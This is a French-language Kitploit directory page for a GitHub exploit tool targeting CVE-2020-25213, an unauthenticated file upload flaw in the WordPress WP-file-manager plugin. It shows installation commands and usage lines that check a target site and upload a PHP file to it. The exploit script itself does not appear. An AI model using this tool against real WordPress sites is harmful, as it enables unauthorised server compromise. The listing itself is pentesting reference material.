Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
wp-file-manager-CVE-2020-25213 — https://medium.com/@mansoorr/exploiting-cve-2020-25213-wp-file-manager-wordpress-plugin-6-9-3f79241f0cd8 | Kitploit
Outils/GitHubGitHub/mansoorr123/wp-file-manager-cve-2020-25213
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubmansoorr123/wp-file-manager-cve-2020-25213

wp-file-manager-CVE-2020-25213

https://medium.com/@mansoorr/exploiting-cve-2020-25213-wp-file-manager-wordpress-plugin-6-9-3f79241f0cd8

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
5826il y a 5 ansVérifié par Kitploit

Exploit de WP-file-manager CVE-2020-25213

Le plugin WordPress WP-file-manager (<6.9) est vulnérable à un téléchargement de fichier arbitraire non authentifié, entraînant un compromis total du système.

Pour plus de détails, consultez mon article publié ici

Avertissement

Je n'ai pas découvert cette vulnérabilité et ne prends aucun crédit pour cette CVE. J'ai seulement créé l'exploit après avoir analysé la description disponible sur divers blogs comme wordfence, seravo avec pour objectif de permettre aux lecteurs de comprendre comment créer un POC en analysant simplement la description de la vulnérabilité.
Je ne suis pas responsable des dommages causés à une organisation utilisant cet exploit et je conseille aux lecteurs de ne pas exploiter cette vulnérabilité sans le consentement écrit de l'organisation, car cela pourrait exposer l'organisation à des attaques d'autres pirates.

Installation

git clone https://github.com/mansoorr123/wp-file-manager-CVE-2020-25213.git
chmod +x wp-file-manager-CVE-2020-25213/wp-file-manager-exploit.sh

Options

root@kitploit:~
-u|--wp_url				Wordpress target url  
-f|--upload_file			Absolute location of local file to upload on the target.  
-k|--check				Only checks whether the vulnerable endpoint exists & have particular fingerprint or not. No file is uploaded.  
-v|--verbose				Also prints curl command which is going to be executed  
-h|--help				Print Help menu  

Utilisation

./wp-file-manager-exploit.sh --wp_url https://www.example.com/wordpress --check
./wp-file-manager-exploit.sh --wp_url https://wordpress.example.com/ -f /tmp/php_hello.php --verbose

Captures d'écran

Capture d'écran 1 Capture d'écran 2 Capture d'écran 3

Crédits

  1. https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/
  2. https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/
Télécharger l’outil